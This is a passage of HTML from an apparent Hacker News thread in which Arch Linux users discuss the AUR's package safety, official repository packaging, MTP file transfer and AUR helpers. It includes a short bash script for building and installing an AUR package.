                  <span class="commtext c00">Yeah, <i>Chromium</i>, which is FOSS, not Google Chrome, and Google Noto Fonts, which are also FOSS.<p>Anything proprietary can&#x27;t simply be copied over and mirrored for copyright reasons.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                  <tr class='athing comtr' id='17502411'><td><table border='0'>  <tr>    <td class='ind' indent='2'><img src="s.gif" height="1" width="80"></td><td valign="top" class="votelinks">
      <center><a id='up_17502411'href='vote?id=17502411&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=arendtio" class="hnuser">arendtio</a> <span class="age" title="2018-07-10T21:37:12"><a href="item?id=17502411">on July 10, 2018</a></span> <span id="unv_17502411"></span>          <span class='navs'>
             | <a href="#17501983" class="clicky" aria-hidden="true">root</a> | <a href="#17502307" class="clicky" aria-hidden="true">parent</a> | <a href="#17503426" class="clicky" aria-hidden="true">prev</a> | <a href="#17502445" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502411" n="4" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">I wonder how other distributions solve that situation.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17502493'><td><table border='0'>  <tr>    <td class='ind' indent='3'><img src="s.gif" height="1" width="120"></td><td valign="top" class="votelinks">
      <center><a id='up_17502493'href='vote?id=17502493&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=blfr" class="hnuser">blfr</a> <span class="age" title="2018-07-10T21:49:35"><a href="item?id=17502493">on July 10, 2018</a></span> <span id="unv_17502493"></span>          <span class='navs'>
             | <a href="#17501983" class="clicky" aria-hidden="true">root</a> | <a href="#17502411" class="clicky" aria-hidden="true">parent</a> | <a href="#17502515" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502493" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">By being popular enough to have providers package the software for them. For example, Chrome is available from a repo maintained by Google itself.<p><a href="https:&#x2F;&#x2F;www.google.com&#x2F;linuxrepositories&#x2F;" rel="nofollow">https:&#x2F;&#x2F;www.google.com&#x2F;linuxrepositories&#x2F;</a><p>OTOH, you&#x27;re basically giving Google root access to your machine.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
            <tr class='athing comtr' id='17502515'><td><table border='0'>  <tr>    <td class='ind' indent='3'><img src="s.gif" height="1" width="120"></td><td valign="top" class="votelinks">
      <center><a id='up_17502515'href='vote?id=17502515&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=Hello71" class="hnuser">Hello71</a> <span class="age" title="2018-07-10T21:51:09"><a href="item?id=17502515">on July 10, 2018</a></span> <span id="unv_17502515"></span>          <span class='navs'>
             | <a href="#17501983" class="clicky" aria-hidden="true">root</a> | <a href="#17502411" class="clicky" aria-hidden="true">parent</a> | <a href="#17502493" class="clicky" aria-hidden="true">prev</a> | <a href="#17502451" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502515" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Either ignore them (Ubuntu) or they just don&#x27;t. For many years Debian and Fedora didn&#x27;t have MP3 decoder installed by default.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
            <tr class='athing comtr' id='17502451'><td><table border='0'>  <tr>    <td class='ind' indent='3'><img src="s.gif" height="1" width="120"></td><td valign="top" class="votelinks">
      <center><a id='up_17502451'href='vote?id=17502451&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=Foxboron" class="hnuser">Foxboron</a> <span class="age" title="2018-07-10T21:42:11"><a href="item?id=17502451">on July 10, 2018</a></span> <span id="unv_17502451"></span>          <span class='navs'>
             | <a href="#17501983" class="clicky" aria-hidden="true">root</a> | <a href="#17502411" class="clicky" aria-hidden="true">parent</a> | <a href="#17502515" class="clicky" aria-hidden="true">prev</a> | <a href="#17502445" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502451" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Distributing them as repackaged binaries would be against the terms. I&#x27;m unsure what distros ignores the terms and packages them anyway. It is a clear liability for any larger distributions at least.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                        <tr class='athing comtr' id='17502445'><td><table border='0'>  <tr>    <td class='ind' indent='1'><img src="s.gif" height="1" width="40"></td><td valign="top" class="votelinks">
      <center><a id='up_17502445'href='vote?id=17502445&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=Foxboron" class="hnuser">Foxboron</a> <span class="age" title="2018-07-10T21:40:51"><a href="item?id=17502445">on July 10, 2018</a></span> <span id="unv_17502445"></span>          <span class='navs'>
             | <a href="#17501983" class="clicky" aria-hidden="true">parent</a> | <a href="#17502307" class="clicky" aria-hidden="true">prev</a> | <a href="#17501939" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502445" n="10" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">What packages would you like to se inn our repositories?</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17502702'><td><table border='0'>  <tr>    <td class='ind' indent='2'><img src="s.gif" height="1" width="80"></td><td valign="top" class="votelinks">
      <center><a id='up_17502702'href='vote?id=17502702&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=Aardwolf" class="hnuser">Aardwolf</a> <span class="age" title="2018-07-10T22:17:19"><a href="item?id=17502702">on July 10, 2018</a></span> <span id="unv_17502702"></span>          <span class='navs'>
             | <a href="#17501983" class="clicky" aria-hidden="true">root</a> | <a href="#17502445" class="clicky" aria-hidden="true">parent</a> | <a href="#17504044" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502702" n="7" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Imho, especially things that are important solutions to common things on the Archwiki but are AUR, indicated with the AUR superscript there.<p>For example for MTP:
<a href="https:&#x2F;&#x2F;wiki.archlinux.org&#x2F;index.php&#x2F;Media_Transfer_Protocol" rel="nofollow">https:&#x2F;&#x2F;wiki.archlinux.org&#x2F;index.php&#x2F;Media_Transfer_Protocol</a>
The one that worked most stable for me was simple-mtpfs, but it&#x27;s AUR.<p>It happens with other archwiki topics too, I encounter it regularly though can&#x27;t think of good examples from the top of my head currently. E.g. the btrfs article mentions several AUR utilities though admittedly nothing important I need right now :)<p>And then some important development tools, like closure-compiler
<a href="https:&#x2F;&#x2F;aur.archlinux.org&#x2F;packages&#x2F;closure-compiler&#x2F;" rel="nofollow">https:&#x2F;&#x2F;aur.archlinux.org&#x2F;packages&#x2F;closure-compiler&#x2F;</a></span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17502785'><td><table border='0'>  <tr>    <td class='ind' indent='3'><img src="s.gif" height="1" width="120"></td><td valign="top" class="votelinks">
      <center><a id='up_17502785'href='vote?id=17502785&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=Foxboron" class="hnuser">Foxboron</a> <span class="age" title="2018-07-10T22:31:24"><a href="item?id=17502785">on July 10, 2018</a></span> <span id="unv_17502785"></span>          <span class='navs'>
             | <a href="#17501983" class="clicky" aria-hidden="true">root</a> | <a href="#17502702" class="clicky" aria-hidden="true">parent</a> | <a href="#17519302" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502785" n="5" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">&gt;simple-mtpfs<p>Not maintained (last commit in 2016). So that will be something low on the priority list.<p>&gt;btrfs<p>The dedupe tool looks interesting. Noted on my todo.<p>&gt;closure-compiler<p>Was dropped from the repository. Probably because of the lack of an maintainer.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17503081'><td><table border='0'>  <tr>    <td class='ind' indent='4'><img src="s.gif" height="1" width="160"></td><td valign="top" class="votelinks">
      <center><a id='up_17503081'href='vote?id=17503081&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=Aardwolf" class="hnuser">Aardwolf</a> <span class="age" title="2018-07-10T23:23:47"><a href="item?id=17503081">on July 10, 2018</a></span> <span id="unv_17503081"></span>          <span class='navs'>
             | <a href="#17501983" class="clicky" aria-hidden="true">root</a> | <a href="#17502785" class="clicky" aria-hidden="true">parent</a> | <a href="#17519302" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17503081" n="4" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">&gt; Not maintained (last commit in 2016). So that will be something low on the priority list.<p>I see! Time for me to start looking for a new method of transfering files from android then, thanks for the heads up</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17503437'><td><table border='0'>  <tr>    <td class='ind' indent='5'><img src="s.gif" height="1" width="200"></td><td valign="top" class="votelinks">
      <center><a id='up_17503437'href='vote?id=17503437&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=bscphil" class="hnuser">bscphil</a> <span class="age" title="2018-07-11T00:28:59"><a href="item?id=17503437">on July 11, 2018</a></span> <span id="unv_17503437"></span>          <span class='navs'>
             | <a href="#17501983" class="clicky" aria-hidden="true">root</a> | <a href="#17503081" class="clicky" aria-hidden="true">parent</a> | <a href="#17503142" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17503437" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">There&#x27;s a very nice open source sshd daemon based on dropbear that I use. Doesn&#x27;t require root or anything. I use it for pretty much all my file transfer needs. <a href="https:&#x2F;&#x2F;play.google.com&#x2F;store&#x2F;apps&#x2F;details?id=org.galexander.sshd" rel="nofollow">https:&#x2F;&#x2F;play.google.com&#x2F;store&#x2F;apps&#x2F;details?id=org.galexander...</a></span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
            <tr class='athing comtr' id='17503142'><td><table border='0'>  <tr>    <td class='ind' indent='5'><img src="s.gif" height="1" width="200"></td><td valign="top" class="votelinks">
      <center><a id='up_17503142'href='vote?id=17503142&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=Aelius" class="hnuser">Aelius</a> <span class="age" title="2018-07-10T23:36:43"><a href="item?id=17503142">on July 10, 2018</a></span> <span id="unv_17503142"></span>          <span class='navs'>
             | <a href="#17501983" class="clicky" aria-hidden="true">root</a> | <a href="#17503081" class="clicky" aria-hidden="true">parent</a> | <a href="#17503437" class="clicky" aria-hidden="true">prev</a> | <a href="#17506603" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17503142" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Honestly I&#x27;ve always found MTP to be incredibly slow and sometimes unreliable.<p>I personally just install termux, which allows you to install openssh. Run sshd and then you can use rsync or scp or sshfs or other from the host PC.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
            <tr class='athing comtr' id='17506603'><td><table border='0'>  <tr>    <td class='ind' indent='5'><img src="s.gif" height="1" width="200"></td><td valign="top" class="votelinks">
      <center><a id='up_17506603'href='vote?id=17506603&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=pritambaral" class="hnuser">pritambaral</a> <span class="age" title="2018-07-11T13:20:57"><a href="item?id=17506603">on July 11, 2018</a></span> <span id="unv_17506603"></span>          <span class='navs'>
             | <a href="#17501983" class="clicky" aria-hidden="true">root</a> | <a href="#17503081" class="clicky" aria-hidden="true">parent</a> | <a href="#17503142" class="clicky" aria-hidden="true">prev</a> | <a href="#17519302" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17506603" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">KDE Connect allows transferring individual files or browsing the Android filesystem, in addition to all its other goodies.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                        <tr class='athing comtr' id='17519302'><td><table border='0'>  <tr>    <td class='ind' indent='3'><img src="s.gif" height="1" width="120"></td><td valign="top" class="votelinks">
      <center><a id='up_17519302'href='vote?id=17519302&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=chungy" class="hnuser">chungy</a> <span class="age" title="2018-07-12T22:55:39"><a href="item?id=17519302">on July 12, 2018</a></span> <span id="unv_17519302"></span>          <span class='navs'>
             | <a href="#17501983" class="clicky" aria-hidden="true">root</a> | <a href="#17502702" class="clicky" aria-hidden="true">parent</a> | <a href="#17502785" class="clicky" aria-hidden="true">prev</a> | <a href="#17504044" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17519302" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">For MTP: gvfs-mtp is in the main repos, and pretty much the fullest-featured MTP implementation that exists, which includes all the extensions Android made to it to turn it into a block-oriented file system.<p>Honestly, MTP is terrible on every OS though. Mac and Windows have it a _lot_ worse for interacting with MTP devices.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                  <tr class='athing comtr' id='17504044'><td><table border='0'>  <tr>    <td class='ind' indent='2'><img src="s.gif" height="1" width="80"></td><td valign="top" class="votelinks">
      <center><a id='up_17504044'href='vote?id=17504044&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=hardenedmetapod" class="hnuser">hardenedmetapod</a> <span class="age" title="2018-07-11T02:38:08"><a href="item?id=17504044">on July 11, 2018</a></span> <span id="unv_17504044"></span>          <span class='navs'>
             | <a href="#17501983" class="clicky" aria-hidden="true">root</a> | <a href="#17502445" class="clicky" aria-hidden="true">parent</a> | <a href="#17502702" class="clicky" aria-hidden="true">prev</a> | <a href="#17501939" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17504044" n="2" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">&gt;Not spelling AUR right<p>Honestly AUR has covered everything I&#x27;ve needed.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17506461'><td><table border='0'>  <tr>    <td class='ind' indent='3'><img src="s.gif" height="1" width="120"></td><td valign="top" class="votelinks">
      <center><a id='up_17506461'href='vote?id=17506461&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=Foxboron" class="hnuser">Foxboron</a> <span class="age" title="2018-07-11T12:55:39"><a href="item?id=17506461">on July 11, 2018</a></span> <span id="unv_17506461"></span>          <span class='navs'>
             | <a href="#17501983" class="clicky" aria-hidden="true">root</a> | <a href="#17504044" class="clicky" aria-hidden="true">parent</a> | <a href="#17501939" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17506461" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">I package for Arch so the question is what the author wants in our repositories. Not in AUR.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                              <tr class='athing comtr' id='17501939'><td><table border='0'>  <tr>    <td class='ind' indent='0'><img src="s.gif" height="1" width="0"></td><td valign="top" class="votelinks">
      <center><a id='up_17501939'href='vote?id=17501939&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=jdlyga" class="hnuser">jdlyga</a> <span class="age" title="2018-07-10T20:39:55"><a href="item?id=17501939">on July 10, 2018</a></span> <span id="unv_17501939"></span>          <span class='navs'>
             | <a href="#17501983" class="clicky" aria-hidden="true">prev</a> | <a href="#17501520" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17501939" n="11" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">This is exactly what we&#x27;ve been preparing for.  Don&#x27;t use yaourt, and read those diffs.  I know a lot of people don&#x27;t do this, but it&#x27;s important.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17502074'><td><table border='0'>  <tr>    <td class='ind' indent='1'><img src="s.gif" height="1" width="40"></td><td valign="top" class="votelinks">
      <center><a id='up_17502074'href='vote?id=17502074&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=CodyReichert" class="hnuser">CodyReichert</a> <span class="age" title="2018-07-10T20:56:21"><a href="item?id=17502074">on July 10, 2018</a></span> <span id="unv_17502074"></span>          <span class='navs'>
             | <a href="#17501939" class="clicky" aria-hidden="true">parent</a> | <a href="#17502782" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502074" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Yeah it&#x27;s funny, my first thought was since I started using Arch, the most common thing I hear people say is that packages from AUR should be considered unsafe until you&#x27;ve read the PKGBUILD, at least. It&#x27;s a good thing it gets brought up so much, unfortunately.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
            <tr class='athing comtr' id='17502782'><td><table border='0'>  <tr>    <td class='ind' indent='1'><img src="s.gif" height="1" width="40"></td><td valign="top" class="votelinks">
      <center><a id='up_17502782'href='vote?id=17502782&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=tyfon" class="hnuser">tyfon</a> <span class="age" title="2018-07-10T22:30:59"><a href="item?id=17502782">on July 10, 2018</a></span> <span id="unv_17502782"></span>          <span class='navs'>
             | <a href="#17501939" class="clicky" aria-hidden="true">parent</a> | <a href="#17502074" class="clicky" aria-hidden="true">prev</a> | <a href="#17502548" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502782" n="2" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Even yaourt defaults to prompting you to read all the packages scripts and displays a red <i></i><i></i>WARNING UNSAFE<i></i><i></i> when the package is unmaintained as this one was.<p>It has options to configure it to do everything automatically, but you have to actively go in and set it so.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17510918'><td><table border='0'>  <tr>    <td class='ind' indent='2'><img src="s.gif" height="1" width="80"></td><td valign="top" class="votelinks">
      <center><a id='up_17510918'href='vote?id=17510918&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=exegete" class="hnuser">exegete</a> <span class="age" title="2018-07-11T23:01:59"><a href="item?id=17510918">on July 11, 2018</a></span> <span id="unv_17510918"></span>          <span class='navs'>
             | <a href="#17501939" class="clicky" aria-hidden="true">root</a> | <a href="#17502782" class="clicky" aria-hidden="true">parent</a> | <a href="#17502548" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17510918" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">yaourt sources the PKGBUILD before it allows you to review it, which is why it is considered unsafe.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                  <tr class='athing comtr' id='17502548'><td><table border='0'>  <tr>    <td class='ind' indent='1'><img src="s.gif" height="1" width="40"></td><td valign="top" class="votelinks">
      <center><a id='up_17502548'href='vote?id=17502548&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=thsowers" class="hnuser">thsowers</a> <span class="age" title="2018-07-10T21:55:15"><a href="item?id=17502548">on July 10, 2018</a></span> <span id="unv_17502548"></span>          <span class='navs'>
             | <a href="#17501939" class="clicky" aria-hidden="true">parent</a> | <a href="#17502782" class="clicky" aria-hidden="true">prev</a> | <a href="#17501520" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502548" n="7" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">What would you recommend over yaourt?</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17503107'><td><table border='0'>  <tr>    <td class='ind' indent='2'><img src="s.gif" height="1" width="80"></td><td valign="top" class="votelinks">
      <center><a id='up_17503107'href='vote?id=17503107&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=cosmojg" class="hnuser">cosmojg</a> <span class="age" title="2018-07-10T23:28:51"><a href="item?id=17503107">on July 10, 2018</a></span> <span id="unv_17503107"></span>          <span class='navs'>
             | <a href="#17501939" class="clicky" aria-hidden="true">root</a> | <a href="#17502548" class="clicky" aria-hidden="true">parent</a> | <a href="#17505291" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17503107" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">I love yay[1]. It has few dependencies, integrates well with pacman, has a useful search function, and is incredibly easy to use. I recommend using the binary version (yay-bin[2]) available in the AUR since it doesn&#x27;t require compilation and has the fewest dependencies of any AUR helper.<p>[1] <a href="https:&#x2F;&#x2F;github.com&#x2F;Jguer&#x2F;yay" rel="nofollow">https:&#x2F;&#x2F;github.com&#x2F;Jguer&#x2F;yay</a><p>[2] <a href="https:&#x2F;&#x2F;aur.archlinux.org&#x2F;packages&#x2F;yay-bin&#x2F;" rel="nofollow">https:&#x2F;&#x2F;aur.archlinux.org&#x2F;packages&#x2F;yay-bin&#x2F;</a></span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
            <tr class='athing comtr' id='17505291'><td><table border='0'>  <tr>    <td class='ind' indent='2'><img src="s.gif" height="1" width="80"></td><td valign="top" class="votelinks">
      <center><a id='up_17505291'href='vote?id=17505291&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=blarg1" class="hnuser">blarg1</a> <span class="age" title="2018-07-11T08:20:34"><a href="item?id=17505291">on July 11, 2018</a></span> <span id="unv_17505291"></span>          <span class='navs'>
             | <a href="#17501939" class="clicky" aria-hidden="true">root</a> | <a href="#17502548" class="clicky" aria-hidden="true">parent</a> | <a href="#17503107" class="clicky" aria-hidden="true">prev</a> | <a href="#17502597" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17505291" n="2" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">#!&#x2F;bin&#x2F;bash
set -e<p>if [ -z &quot;$1&quot; ]; then echo &quot;No package name specified.&quot;; exit; fi<p>mkdir -p $1<p>cd $1<p>wget -q &quot;<a href="https:&#x2F;&#x2F;aur.archlinux.org&#x2F;cgit&#x2F;aur.git&#x2F;snapshot&#x2F;$1.tar.gz&quot;" rel="nofollow">https:&#x2F;&#x2F;aur.archlinux.org&#x2F;cgit&#x2F;aur.git&#x2F;snapshot&#x2F;$1.tar.gz&quot;</a><p>tar xzf $1.tar.gz<p>cd $1<p>makepkg -sf<p>read -n 1 -s -p &quot;Press any key to continue...&quot;<p>echo -e &quot;\n&quot;<p>sudo pacman -U --noconfirm --needed $1*pkg.tar.xz</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17519626'><td><table border='0'>  <tr>    <td class='ind' indent='3'><img src="s.gif" height="1" width="120"></td><td valign="top" class="votelinks">
      <center><a id='up_17519626'href='vote?id=17519626&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=thsowers" class="hnuser">thsowers</a> <span class="age" title="2018-07-13T00:07:30"><a href="item?id=17519626">on July 13, 2018</a></span> <span id="unv_17519626"></span>          <span class='navs'>
             | <a href="#17501939" class="clicky" aria-hidden="true">root</a> | <a href="#17505291" class="clicky" aria-hidden="true">parent</a> | <a href="#17502597" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17519626" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Now _that&#x27;s_ a package manager!</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                  <tr class='athing comtr' id='17502597'><td><table border='0'>  <tr>    <td class='ind' indent='2'><img src="s.gif" height="1" width="80"></td><td valign="top" class="votelinks">
      <center><a id='up_17502597'href='vote?id=17502597&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=syrak" class="hnuser">syrak</a> <span class="age" title="2018-07-10T22:02:16"><a href="item?id=17502597">on July 10, 2018</a></span> <span id="unv_17502597"></span>          <span class='navs'>
             | <a href="#17501939" class="clicky" aria-hidden="true">root</a> | <a href="#17502548" class="clicky" aria-hidden="true">parent</a> | <a href="#17505291" class="clicky" aria-hidden="true">prev</a> | <a href="#17503457" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502597" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">aurman. More choices can be found here <a href="https:&#x2F;&#x2F;wiki.archlinux.org&#x2F;index.php&#x2F;AUR_helpers" rel="nofollow">https:&#x2F;&#x2F;wiki.archlinux.org&#x2F;index.php&#x2F;AUR_helpers</a></span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
            <tr class='athing comtr' id='17503457'><td><table border='0'>  <tr>    <td class='ind' indent='2'><img src="s.gif" height="1" width="80"></td><td valign="top" class="votelinks">
      <center><a id='up_17503457'href='vote?id=17503457&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=bscphil" class="hnuser">bscphil</a> <span class="age" title="2018-07-11T00:32:53"><a href="item?id=17503457">on July 11, 2018</a></span> <span id="unv_17503457"></span>          <span class='navs'>
